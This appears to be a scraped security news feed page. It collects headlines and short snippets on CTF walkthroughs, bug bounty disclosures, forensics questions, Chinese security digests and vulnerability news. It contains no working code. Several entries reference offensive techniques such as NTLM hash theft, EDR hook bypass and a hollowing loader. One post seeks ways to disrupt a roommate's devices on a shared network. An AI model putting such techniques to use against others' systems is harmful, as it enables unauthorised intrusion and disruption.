    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )
  • Open

    Digital forensics: Investigation VS Security
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-16 Review
    安全学术会议排行榜(2021版) by ourren Graph Embedding实战系列:Node2vec原理与代码实战 by ourren 初识WebAssembly by ourren 现代网络犯罪模式解读 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-16 Review
    安全学术会议排行榜(2021版) by ourren Graph Embedding实战系列:Node2vec原理与代码实战 by ourren 初识WebAssembly by ourren 现代网络犯罪模式解读 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Bug Type: HTML injection in confirmation Email !
    Hey Everyone! This is about another low-hanging fruit (I’m still not a pro) in one of the web applications listed by OpenBugbounty. Continue reading on Medium »  ( 2 min )
    Advanced persistent threat (APT)
    When a system is under attack, Most of people think it as a one-time transfer. when a hacker finds a way to enter into the system, he… Continue reading on Medium »  ( 1 min )
    WTF IS IDOR!?
    One of the most crucial Vulnerabilities listed in top 10 of OWASP is Insecure Direct Object Reference Vulnerability (IDOR Vulnerability)… Continue reading on Medium »  ( 3 min )
    Authentication Bypass -TryHackMe
    Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i was able to see Sensitive Information on One of the India’s best School Website.
    Hello Readers, Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide
    Below is a flow diagram based on my experience on how you should start your bug bounty journey. Irrespective of your technical background… Continue reading on Medium »
  • Open

    Dark Web Scraping by OSINT - Scraping & Tools
    ➢ Dark Web Scraping & Tools Continue reading on Medium »  ( 5 min )
    Dark Web Scraping by OSINT - Darknet & TOR
    ➢ History of the Dark Web Continue reading on Medium »  ( 4 min )
    Dark Web Scraping by OSINT - OSINT & Hidden Internet
    ➢ What is OSINT? Continue reading on Medium »  ( 2 min )
  • Open

    DIY wood chippers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    I couldn't think of a title so here is a start a long long of music..Feeling sublime? Dont be a tool.I have the cure, If you go three doors down you might see some bare naked ladies!
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

    FreeBuf早报 | 未来三年中国网安市场将保持15%以上增速;Linux 恶意软件在 2021 年增长 35%
    中国网络安全产业联盟发布了《中国网络安全产业分析报告(2021年)》,预测未来三年,网络安全市场将保持15%以上的增速,到2023年市场规模将超过800亿元。  ( 1 min )
  • Open

    Lack of URL normalization renders Blocked-Previews feature ineffectual
    Slack disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1102764 - Bounty: $1000
  • Open

    Cerbersec/Ares: Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique
    submitted by /u/dmchell [link] [comments]
  • Open

    Are there examples where two apps together on a device introduced a vulnerability where neither alone necessarily would?
    I'm looking for examples where the interplay between two apps led to a vulnerability which wouldn't exist if either of these apps were present alone. I can think of a contrived ways on paper where something like this could happen, e.g. App A creates what it thinks is a uniquely named file and places it somewhere common. App B uses that same file name + path and does limited/no checking that it's created by App B and not another app and leads to undesirable effects. (One could argue this is a vulnerability in App B by itself but) But are there actually examples where something like this has happened? Someone's banking app is compromised because they also have the Delta app on their phone, etc. etc. Thanks for satiating my curiosity. submitted by /u/CorbinGDawg69 [link] [comments]  ( 1 min )

  • Open

    How i found “Broken Access Control Through out-of-sync setup” and got $1000
    Hello everyone ! , Hope you all are doing well, I would like to share my “Broken Access Control Through out-of-sync setup” Continue reading on Medium »  ( 6 min )
  • Open

    BreadMan Module Stomping & API Unhooking Using Native APIs
    submitted by /u/dmchell [link] [comments]
  • Open

    Need your ideas for my Master's year project
    My project is on Honeypot, so basically what I did till now is, I have deployed T-Pot Honeypot on my machine and started getting attacks on it and my plan is to create firewall against those attacks. I am also thinking to to do a comparison analysis of SIEM tool : ELK and Splunk but not sure I should do it or not. So, I need you to give some more ideas like what else can be done and how should I create firewall? Thanks in advance. submitted by /u/GuireccSS [link] [comments]  ( 1 min )
    Blocking DNS over HTTPS
    basically 443 already headache since cannot decrypt traffic for all of devices but i think DNS over HTTPS is one of the important items. Anything can be done besides manually blocking some known dns providers list? Adding note: Purpose is network security, dont want dns over http on the network. I know not only dns can be passed through 443 but this seems like most important submitted by /u/shodanless [link] [comments]  ( 2 min )
    Creative ways to knock someone off router using too much bandwidth?
    We have pretty slow internet at our house and it’s split across myself and a few roommates. One roommate in particular is doing…something where the bandwidth my other roommate and I get basically drops to zero for hours on end. We’ve asked them to be more considerate, and they don’t seem interested in sharing what awful internet we have. Obviously we could just log into the router and blacklist his devices, but the router is in his room, so he can just unplug it and then we’re all screwed. What are some more “creative” ways to knock his devices off the network, or otherwise prevent them from hogging all the bandwidth on the network, that doesn’t involve access to the router? Edit: I appreciate the great advice coming out of AskNetsec about communication and other interpersonal skills, loving the high empathy in this community. That said, let’s keep this to a very narrow threat model with the assumption that: the roommate is unwilling to communicate installing any new hardware is impossible access to the router is impossible buying a 2nd internet connection is impossible The model therefore should be the targets computer, which must be impacted by the actors computer directly, through the router possibly, but without changing any settings on it submitted by /u/JamieOvechkin [link] [comments]  ( 5 min )
    Who do we hire and why?
    Some of the past subjects and replies seems to imply there are alot of questions on what is a qualified cyber security employee. So lets try to help the boys and gurls that want to enter this career and are not sure of what we are looking for. So for all you hiring managers and anyone that was involved in hiring decisions for Cyber Security hires in the past 5 years(Pre and post covid) Please answer the following questions and lets see if we can give the prospects some ideas on what they need vs what they think they need. 1. Industry, job title/descriptions and ball park salary. Education – Cyber Security Jr Analyst, assist the cyber security team in daily duties. $35k Auto Motive – Sr Cyber Security Engineer, SME in Email, cloud EDR/XDR, C level reporting and mentoring. $150k Auto Mot…  ( 4 min )
    did 1.1.1.1 is a vpn?
    submitted by /u/Environmental_Camp24 [link] [comments]  ( 1 min )
    Secure Boot is silently disabled after a BIOS upgrade
    Hi. I'm new to this subreddit, so I'm not sure if my question is appropriate here. Feel free to direct me to another subreddit. After installing the beta version 7B86vAG4 of the BIOS for my MSI B450-A PRO motherboard, Secure Boot silently stopped working. That is, it boots any OS, for example, the Arch Linux installation medium. I see this behavior with factory default Secure Boot keys which likely are MSI's and Microsoft's keys and with my own keys. But keys shouldn't matter since the Arch Linux installation medium isn't signed by anybody: The official installation image does not support Secure Boot (FS#53864). To successfully boot the installation medium you will need to disable Secure Boot. source I reverted to the version 7B86vAD where Secure Boot works as expected. The last reply from the MSI support was: I: I do not use Windows at all. Support: Generally speaking, the secure boot won't take effect if you system cannot be supported. Please don't worry about it. Thanks! Well, I don't think I shouldn't worry about that. Secure Boot should work irrespective of the OS in this case since the OS isn't even booted. There are many people using Secure Boot with Linux. I would like to know whether this is just my motherboard or I set up Secure Boot incorrectly. If it's not just me, I feel obliged to report this bug somewhere. A user won't see it if they set up Secure Boot before upgrading their BIOS. submitted by /u/beroal [link] [comments]  ( 1 min )
    Do you allow google docs to your employees on the LAN?
    Hi Folks As we all know Google Drive/Docs/Sheets, Dropbox or any other cloud storage are major vectors for malware so we are blocking them in our corporate LAN. Lately, our organization employees satisfaction department in HR started conducting surveys using Google doc by sharing link with all employees and asked IT department to ensure it is working on all desktops. Is it safe to allow ? I understand there are security risks but a business demand on the other hand that needs to taken care of. Can someone give second thought on this please? Would love to have your valuable inputs submitted by /u/techno_it [link] [comments]  ( 2 min )
    Best automated pen testing software
    Hi folks, I have a vendor that will require me to open an application to the web for credit card processing. I don't believe they're taking security seriously so I'm currently looking at hiring a vendor to do penetraton testing for that app through the firewall. However, if the bids come in too high, and just for ongoing testing in general, I'd like to learn what knowledgeable folks use for automated penetration testing. Please don't say, "Kali" unless you can help me with a specific program I can use on that veritable swiss army knife of hacking tools. :) Thanks in advance! submitted by /u/Leeto2 [link] [comments]  ( 3 min )
    HELP! Should I consider myself hacked/go into panic mode over this?
    Three months ago I received a newsletter from AltCoinTrader.co.za on my Gmail inbox. However, I never signed up for this site. I initially brushed it off for peace of mind. But I keep getting scared every time I remember it so I wanted to finish it by contacting the sites support and ask if my email was ever registered with them. To my horror, they said that someone did register but did not activate the account in May 2020. However, I could not find an activation email in my inbox, which has me worried that someone does have access to it and deleted it before I could see it. It is unlikely to be me since I wrote an email around the same time and other useless emails at that time period are still there. I have switched PCs since May 2020, but have kept my phone. My Gmail also has a new password + 2FA now. However, the new PC did share the same network briefly with my old PC. I very recently re-opened my old PC and did a thorough malware scan. Unfortunately, it found 3 Trojans. Current PC has had a clean bill of health so far. Problem is I have done very sensitive stuff on that PC from credit card details, SSN, online banking passwords, and, worst of all, confidential information for my work, including customers' personal data. I still don't know if I should treat this as a confirmed hack and/or full-on panic. Aside from this anomaly and the Trojans, the only other weird thing is my phone keeps logging account activity by itself sometimes (which I assume is it just pinging Google servers). Apart from that none of my accounts showed any signs of compromise. I also consulted someone earlier who said the Trojans could possibly be unrelated. And it is unclear what the motive is for someone to use someone else's email for crypto trading and log in to the account only to delete the confirmation email. Please help me with this. This is so strange, and a lot is at stake if I was compromised. I might actually get hospitalized over the stress from this. submitted by /u/WrestleMaykr [link] [comments]  ( 2 min )
    Wordlist Generation for Password Cracking
    I have been researching software to use to generate wordlists for password cracking but haven't been able to find one that generates passwords given parameters (birthday, hobbies, etc.) Does anyone know of any software that can do this or should I just try to create my own? Thanks in advance submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    Being aggressively targeted how can I make a VM that cannot put anything on my host machine?
    Hello everyone first off I just want to say great community, second of all, I have a question that needs severe attention. Me and my father are being aggressively targeted from malware writers for a reason I don't want to reveal, we didn't do anything bad, we aren't bad people, it's because of what we have. I would rather not spend the money for Sophos Sandstorm, or any of the other costly products out there when this can all be done open source, and with some smart minds. I need to have Windows 10 on my machine for business software unfortunately, or I'd jump to Linux. Either way, I am still a target. I need to put a VM on my machine (if thats the best way to do this, if not please say so), or multiple VM's. I need to know which VM to use, and how to make it so that if I do get malware on my VM, which I would be using all the time, it will not be able to pass through and attach itself on to my host machine. How exactly is this possible, and what settings do I need to set, what Linux distro should I use, and will I be safe using the business software which is Win10 only on a VM? I can use the software with my Ethernet unplugged, and I have no WNIC on my PC. ​ Thank you very much for your help, it is appreciated more than you know. submitted by /u/pixeldev [link] [comments]  ( 4 min )
    Issues with GIAC labs?
    I have a buddy who is studying for a giac exam who says the labs on the practice tests are trash. Can anyone confirm this? Is this a common issue? submitted by /u/sephstorm [link] [comments]  ( 1 min )
    deleted google account
    i am trying to recover data from a deleted google account. i have local law enforcement requesting all data related to the google account. are we going to be able to recover deleted emails and other files? submitted by /u/LS2fast [link] [comments]  ( 1 min )
  • Open

    Toolbox HackTheBox Walkthrough
    Introduction Toolbox is a CTF Windows box with difficulty rated as “easy” on the HackTheBox platform. The machine covers SQL injections, gaining interactive shell, escaping The post Toolbox HackTheBox Walkthrough appeared first on Hacking Articles.  ( 4 min )
    Multiple Files to Capture NTLM Hashes: NTLM Theft
    Introduction Often while conducting penetration tests, attackers aim to escalate their privileges. Be it Kerberoasting or a simple lsass dump attack, stealing NTLM hashes always The post Multiple Files to Capture NTLM Hashes: NTLM Theft appeared first on Hacking Articles.  ( 5 min )
  • Open

    Toolbox HackTheBox Walkthrough
    Introduction Toolbox is a CTF Windows box with difficulty rated as “easy” on the HackTheBox platform. The machine covers SQL injections, gaining interactive shell, escaping The post Toolbox HackTheBox Walkthrough appeared first on Hacking Articles.  ( 4 min )
    Multiple Files to Capture NTLM Hashes: NTLM Theft
    Introduction Often while conducting penetration tests, attackers aim to escalate their privileges. Be it Kerberoasting or a simple lsass dump attack, stealing NTLM hashes always The post Multiple Files to Capture NTLM Hashes: NTLM Theft appeared first on Hacking Articles.  ( 5 min )
  • Open

    IndexedDB in Safari 15 leaks your browsing activity in real time
    submitted by /u/Synchisis [link] [comments]  ( 1 min )
    A Detailed Guide to cracking the OSWE Certification
    submitted by /u/YashitM [link] [comments]
    10 real-world stories of how we’ve compromised CI/CD pipelines
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-15 Review
    端到端模型在人员流失预警场景的实践 by ourren 互联网领域黑产常见攻击手法初探 by ourren Zeek - Detect Godzilla WebShell by ourren 云防火墙产品的演进思路 by ourren MSF+生成流量免杀木马 by ourren 剖析海莲花组织恶意文件定制化策略 by ourren r3kapig技能栈1.0 by ourren X通信息安全培训体系建设 by ourren ATT&CK Techniques to Security Events by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-01-15 Review
    端到端模型在人员流失预警场景的实践 by ourren 互联网领域黑产常见攻击手法初探 by ourren Zeek - Detect Godzilla WebShell by ourren 云防火墙产品的演进思路 by ourren MSF+生成流量免杀木马 by ourren 剖析海莲花组织恶意文件定制化策略 by ourren r3kapig技能栈1.0 by ourren X通信息安全培训体系建设 by ourren ATT&CK Techniques to Security Events by ourren 更多最新文章,请访问SecWiki
  • Open

    science books & papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Google Search operators
    Does anyone know of a good website or document explaining these Google commands? http://www.googleguide.com/advanced_operators_reference.html How to put them together and explaining the difference between inurl and -inurl? Do I put the file types in brackets, (.mkv|.mp4|.avi|.mov|.mpg|.wmv) like this or does it matter? IE; intext:"chernobyl" intitle:"index.of" (wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) or +(.mkv|.mp4|.avi|.mov|.mpg|.wmv) chernobyl intitle:"index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) Note; commands are in a different order. Does order mater? The above link only explains one command at a time but, apparently you can compound these commands to be more specific. Thanks for your input... submitted by /u/klutz50 [link] [comments]  ( 1 min )
    Movies (2020, 2021), some Series and Anime
    http://smart-playtv.fr/VOD/ submitted by /u/gimvaainl [link] [comments]

  • Open

    Autopsy with wireshark
    Can you import pcap files from wireshark into Autopsy? is there an expansion to do this? submitted by /u/swatteam23 [link] [comments]  ( 1 min )
    Cellebrite 4PC PC requirements
    LE that is just about to become my departments first and sole cellebrite user. We are putting a budget together (cellebrite's sales people are annoyingly hard to get in contact with) and we've got our prices ballparked and everything looks good except a computer build. We've talked with 2 other cellebrite users who both said they had to buy a $4-5k desktop build to work efficiently with cellebrite. I've built a pc before and have a basic knowledge about them, however I don't get these $4k+ build costs when all that's really necessary is an average build with an intell processor and a decent amount of ram. Besides that I have put in a good chunk of the budget to cover memory and additional hard drives to handle data/evidence. Are the other cellebrite users just getting railroaded by vendors selling them over priced pre-built models or is there something more to the build/requirements. Any advice would be greatly appreciated. submitted by /u/crimsontidepride [link] [comments]  ( 4 min )
    Secure storage identification
    A follow-up to my previous post, can confirm that the premium tools are able to obtain contents of the secure storage. I did find a product that will tell you if secure storage is in use. Wondering if anyone knows how to manually determine whether secure storage is in use besides relying on the product to tell you? submitted by /u/scrappybytes [link] [comments]  ( 1 min )
  • Open

    [available] Calculus: Early Transcendentals Ninth Edition
    submitted by /u/joey-sm [link] [comments]
    Rob's stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Massive collection of music (mostly not well known artists)
    Update: Ok, i did not know the links redirected to Amazon (As i do not download mp3 files usually) What caught my attention was the bands names that i did not know about submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
    photos of toronto
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Bolivian buses
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    In orginization stored xss using location (Larksuite survey app)
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/998138 - Bounty: $500
    Stored xss on helpdesk using user's city
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/971857 - Bounty: $500
    SQL Injection and plaintext passwords via User Search
    IBM disclosed a bug submitted by xyantix: https://hackerone.com/reports/703819
    Deserialization of potentially malicious data to RCE
    Django disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1415436
  • Open

    tlsmate: tool to scan TLS servers for their configuration weaknesses and vulnerabilities
    submitted by /u/CantSayThatMuch [link] [comments]
    A Deep Dive into The Grief Ransomware’s Capabilities
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
  • Open

    What are the chances that I get a job abroad after graduating?
    Hey there, I'm from Tunisia (north Africa) I graduated a few months ago majoring in cyber security (I have a 3y degree in network administration and a 3y degree in security). I didn't start looking for a job until these past few days due to a personal problem in the family, but now I'm wondering what are my chances to find a job abroad. The usual destination for us is France but tbh I'm looking for somewhere else, anywhere in Europe,the US or even (uuum especially) Australia. I got 3 CCNA certs and my English is pretty good.The thing is my experience is limited to school projects and 2 internships where I touched on the real world work. I'm not posting my CV unless requested, I'm not here looking for a job (and I don't want to break any rule) but I'm here to ask. Please keep in mind the COVID situation in the world right now which I think is reducing the travelling potential. Thanks in advance. submitted by /u/Dalleuh [link] [comments]  ( 1 min )
    What tools do you use to audit AD users?
    What tools do you use to audit users on AD? For example, a list of those who haven't logged in for a very long time, or who haven't changed their password in a long time, or who are without 2FA. To be honest, I did not find such functionality in AD (or if I did, it was inconvenient). submitted by /u/athanielx [link] [comments]  ( 2 min )
    Appsec engineering at Meta/Facebook - how is the work?
    Hi, I'm wondering how is the work of application security engineers at meta/fb? Do they write code? or only do code reviews? What are the usual tasks of an engineer in such role? submitted by /u/sapup [link] [comments]  ( 1 min )
    CEO scam solution?
    Problem is: fake CEO or Senior Officials social media profiles are used too scam ("pay this fee to get this job"). - What solutions could monitor web/social media to find such fake profiles or websites? - Would these solutions find this? or is it something into social media/web monitoring? Thank you for the answers submitted by /u/NerdSupremacist [link] [comments]  ( 1 min )
    What's the name of this app that displays your other usernames?
    Few years ago, a friend of mine was travelling in GCC. (Gulf States) His friend showed him an app where he fed my friend's phone number and all his social ids popped up. All the different usernames he has been using, on other social media platforms, going back to several years. The sites that he remembers his id from - Grindr, Manjam, Gaydar, Badoo etc. Does anyone knows what is this thing called? or what is the name of such app? submitted by /u/saffrown [link] [comments]  ( 1 min )
    Newbie with a couple questions about the CEH v11!
    Top of the mornin to ya fellow cyber lads and ladies! I'm hoping to take the ANSI v11 exam in the next three months or so and I have the following questions. Is 3 months enough of a prep time if I have a B.S. in Cybersecurity? (From what I hear, the ANSI is just a glorified Sec+) Access to the ilabs, The Textbook, Messier's Practice Tests, Messier's Study Guide, O'Reilly's Videos and Messier's v10 videos on Udemy. Will this do for prep material? Question about CEH Practical here. Will the Practical exam be a good first step on a year long journey to the OSCP? Tenks. submitted by /u/Puddin2yerHarley [link] [comments]  ( 1 min )
    TikTok is hideous...but unfortunately necessary for engaging with my readers. Any advice?
    I generally hate social media. It's toxic, predatory, and spying on the user 95% of the time. Unfortunately it's also a necessary engagement channel for writers. I've banished it from my personal life but unfortunately need to be able to connect with readers and market my stuff. I recently paid for a session with a social media consultant that was aghast I was not on TikTok. I explained my political concerns with TikTok's links to certain authoritarian governments, as well as the massive data-mining hard-cooked into the code, and the evidence it's detrimental to mental health. She looked at me like I was a caveman wearing a tinfoil hat and went on to show me some metrics. Sadly it became clear that most of the reader demographic I'm trying to market my content to are using TikTok almost exclusively as their drug of choice. Fuck. So here's my question/TLDR: Is there a third-party application or method of "corralling" TikTok's spying functions? Is it possible to post via a desktop browser and bypass the application entirely? Should I look into running it inside an emulator? I'd certainly appreciate any input or suggestions! Who knew cyberpunk dystopia could be so banal. submitted by /u/writtenloudly [link] [comments]  ( 5 min )
    Salary range for Jr Security Analyst at Bay Area CA
    Hi all, I was wondering what would be the salary range for Junior security analyst position at the Bay Area California? Is 100k asking too much? The cost of living is really expensive there, so I’m not so sure. Any help is appreciated! submitted by /u/nkookie [link] [comments]  ( 2 min )
    Need your suggestion for this scenario to withstand port scanning
    We have a hosted website which has multiple subdomains though about 1000. Recently a security research company started running port scans and this is affecting our website health. With some page going down and the CPU usage crossing threshold. Basically we the application is deployed in AKS(k8s) and the backends are behind the Azure Front Door and some subdomains are managed by Global Traffic Manager as well all on Azure. Unfortunately we cannot stop these scans however we have been asked to change our design or solution as the port scanner hit every subdomain at the same point which all of them points to a single host and this is causing the issue. Need your advice or suggestions on how we can overcome and withstand the port scans without affecting our site. How to load balance this scenario in a much efficient way submitted by /u/SnooGoats8879 [link] [comments]  ( 1 min )
    Favourite CSPM?
    CSPMs are a must in enterprise environments these days. Based on my initial research, prisma cloud and orca security stand out. Are there any specific CSPMs that you'd recommend besides these two? submitted by /u/DryPath [link] [comments]  ( 1 min )
    Taken care of the parents
    I have an odd one and am looking for some advice. My parents are getting on in age and I am looking for a solution to help monitor their phones and give them remote support when they need it. I am going to hook them into my family plan with Lastpass to help them with passwords but is there anything for android that is the equivalent of LogMeIn? Also more of a general question but how do you all care for your parents tech wise? Not sure if I am over stepping my boundaries bud I've already had one family fall prey to a scammer. submitted by /u/OakenRage [link] [comments]  ( 1 min )
  • Open

    Nim variant of MDSec's Parallel Syscalls EDR hook bypass
    submitted by /u/DarkGrejuva [link] [comments]
    Exploit Kits vs. Google Chrome - Avast Threat Labs
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-01-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Bug Alert —Critical Vulnerability Alerting System
    High impact vulnerability notification over email, phone call, or SMS Continue reading on Medium »  ( 2 min )
    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    True Life: Recovering Bug Bounty Hacker: Chapter 1 — GoodRx
    I decided to start a series about the experiences I’ve had with bug bounty programs. I wanted to first start off with the written story so… Continue reading on Medium »  ( 8 min )
  • Open

    Honeypot Discussions Part-2
    Honeypot Types Continue reading on Medium »  ( 4 min )
    Powershell Execution Strategy
    What is powershell execution strategy Continue reading on Medium »  ( 6 min )
  • Open

    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    Go 1.18 — native Fuzzing and Dinosaurs
    Last month, the Go language team released the Go 1.18 Beta 1. It contains the much awaited generic support, which we’re very excited to… Continue reading on Medium »  ( 4 min )
  • Open

    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    Go 1.18 — native Fuzzing and Dinosaurs
    Last month, the Go language team released the Go 1.18 Beta 1. It contains the much awaited generic support, which we’re very excited to… Continue reading on Medium »  ( 4 min )
  • Open

    乌克兰警方成功逮捕袭击 50 多家公司的勒索软件团伙
    乌克兰警方逮捕了五名网络犯罪分子,据悉,该团伙使用勒索软件袭击了约50家美国和欧洲企业。  ( 1 min )
    知识大陆Q&A vol.03 | 新大陆的第一步
    正式版上线热门提问合集!  ( 1 min )
    FreeBuf街采 | 2022开年我们找10位路人聊了聊网络安全
    FreeBuf小伙伴在街头对路人进行了随机采访,看看他们的网络安全意识、个人防护意识到底如何。
    Java代码审计 —XSS跨站脚本
    通过分析XSS的产生原因来解决如何防御XSS的问题  ( 4 min )
    FreeBuf周报 | 「网安知识大陆」1.0正式上线;Facebook推出“隐私中心”
    各位 FreeBufer 周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    3月2日上海见!CIS 2021 Spring·春日版议题即将公布
    FreeBuf邀请全体网安人于 3 月 2 日至 3 日 在上海宝华万豪酒店 共聚「CIS 2021网络安全创新大会Spring·春日版」。  ( 1 min )
    白宫举办开源安全峰会,众多科技巨头参加
    当地时间1月13日,众多科技巨头公司和联邦机构共聚白宫,就开源软件安全性展开讨论。
    联软科技发布:2022年端点安全十大趋势
    作为中国企业端点安全领域的领导者,联软科技历经19年端点安全实践和行业经验,连续3年持续发布前沿端点安全趋势,旨在为行业提供更多新思路和新参考。  ( 1 min )
    伊朗APT35黑客组织利用Log4j漏洞部署新型PowerShell后门
    研究表示,伊朗APT35组织正在利用Log4Shell漏洞进行攻击并植入一种新型后门。  ( 1 min )
  • Open

    Snikket Server – 2022-01-13 security release (CVE-2022-0217)
    Article URL: https://snikket.org/blog/snikket-jan-2021-security-release/ Comments URL: https://news.ycombinator.com/item?id=29931694 Points: 1 # Comments: 0  ( 2 min )
  • Open

    The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More
    We identify recent trends in web threats, including top malware families. Web skimmers, difficult to detect and easy to deploy, are highlighted. The post The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More appeared first on Unit42.

  • Open

    Bug Report : [ No Valid SPF Records ]
    Ruby disclosed a bug submitted by sohaib619: https://hackerone.com/reports/1301696
    AEM forms XXE Vulnerability
    Adobe disclosed a bug submitted by ismailmuh: https://hackerone.com/reports/1321070
    Disclosure of github access token in config file via nignx off-by-slash
    Adobe disclosed a bug submitted by letm3through: https://hackerone.com/reports/1386547
    Reflected xss and open redirect on larksuite.com using /?back_uri= parameter.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/955606 - Bounty: $500
    [IDOR] Modify other team's reminders via reminderId parameter
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/946323 - Bounty: $500
  • Open

    Propagating phishing via Slack webhooks
    submitted by /u/amirshk [link] [comments]
    Forensics Analysis of the NSO Group’s Pegasus Spyware
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
    BreakingFormation: Orca Security Research Team Discovers AWS CloudFormation Vulnerability
    submitted by /u/eberkut [link] [comments]  ( 1 min )
    SSH Bastion Host Best Practices
    submitted by /u/old-gregg [link] [comments]
    HiddenWall is a tool to generate a custom Hidden firewall to run in Linux kernel.
    submitted by /u/CoolerVoid [link] [comments]  ( 2 min )
    This script analyses the Nmap XML scanning results, parses each CPE context and correlates to search CVE on NIST. You can use that to find public vulnerabilities in services.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    Security bulletin for recent AWS Glue vulnerability
    Article URL: https://aws.amazon.com/security/security-bulletins/AWS-2022-002/ Comments URL: https://news.ycombinator.com/item?id=29927538 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Severe Vulnerability Found in Another NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481671995167506433 Comments URL: https://news.ycombinator.com/item?id=29923463 Points: 4 # Comments: 0  ( 1 min )
    AWS Superglue Vulnerability
    Article URL: https://orca.security/resources/blog/aws-glue-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29923004 Points: 29 # Comments: 3  ( 5 min )
    BreakingFormation: AWS CloudFormation Vulnerability
    Article URL: https://orca.security/resources/blog/aws-cloudformation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29922522 Points: 79 # Comments: 22  ( 5 min )
    Attacking RDP from Inside: Remote Desktop Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside Comments URL: https://news.ycombinator.com/item?id=29920955 Points: 2 # Comments: 0  ( 11 min )
    Found a Vulnerability In NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481537073068843013 Comments URL: https://news.ycombinator.com/item?id=29918100 Points: 1 # Comments: 2  ( 1 min )
    Exploring the Log4Shell Vulnerability through files
    Article URL: https://blog.borneo.io/exploring-the-log4shell-vulnerability-dd7000eed4a4?gi=5d43b39b3d22 Comments URL: https://news.ycombinator.com/item?id=29915825 Points: 2 # Comments: 0  ( 7 min )
  • Open

    SPF Record Question
    If a root domain like sendgrid.net is added to an SPF record, does that mean any free user or paid user of sendgrid can spoof an email from your domain and SPF checks would pass? submitted by /u/mtx4gk [link] [comments]  ( 1 min )
    How do I check if I visited a site with malware?
    I was browsing through reddit and clicked on a link in r/dermotology that send me to a weird site that played a weird video and there was no question or content besides that. I used virus total to check the website and it looks like they're using it for advertising revenue clicks, but my paranoia is kicking in. Site was visited on an android with calyx is using duckduckgo version 5.106.0 So the question is- any ideas if I have to nuke this phone? For the curious the website is below. All the spaces are slashes minus the dot com part. vebotto com 2022 01 13 cystic-pimple submitted by /u/instantpotbeans [link] [comments]  ( 2 min )
    Google Drive Security - VPN and MFA
    Hi there, I'm posting here to get some expert advice, we are a small startup dealing with very sensitive customer data. Problems we are having - How do we best protect customer data within Google Drive? Customers often share data to us via Google Drive. In security questionnaire, we often get this question - is VPN required for employees to access customer data? We can of course turn on VPN requirement for this, but it also adds friction to use Google Drive on a daily basis. Google Drive has MFA turned on, but it does not seem to enforce zero trust policy, and we are never prompted to enter passwords regularly. Any suggestions here? submitted by /u/Commercial_Rip7550 [link] [comments]  ( 1 min )
    Reverse engineering question
    Hi r/AskNetsec I've got a pretty unusual question in regards to RE that might sound weird, or it's just not making sense to me (and baring in mind, I am a beginner to reversing malware). I am currently writing a report and within the report format, "reverse engineering" and "disassembly" are two different sections. This doesn't really make much sense to me. Disassembly is already a form of reverse engineering. Nevertheless, the information that you could insert into an RE section would be Wireshark analysis, viewing the file in PEStudio for instance, but those are already in sections relating to static & dynamic analysis. So what would be inserted into a reverse engineering section regarding malware? I can literally only think of unpacking the malware as everything else that would constitute reverse engineering is in other sections. Honestly, I have no idea. When I asked for some help in regards to knowing the distinction between the two, I was told that "disassembly" is a noun, and "reverse engineering" is a verb. Which is probably right, but it didn't help at all. An example of breaking encryption was proposed in relation to RE. Again, it didn't shed much light for me. I just want to be familiar with the distinction here. Thanks. 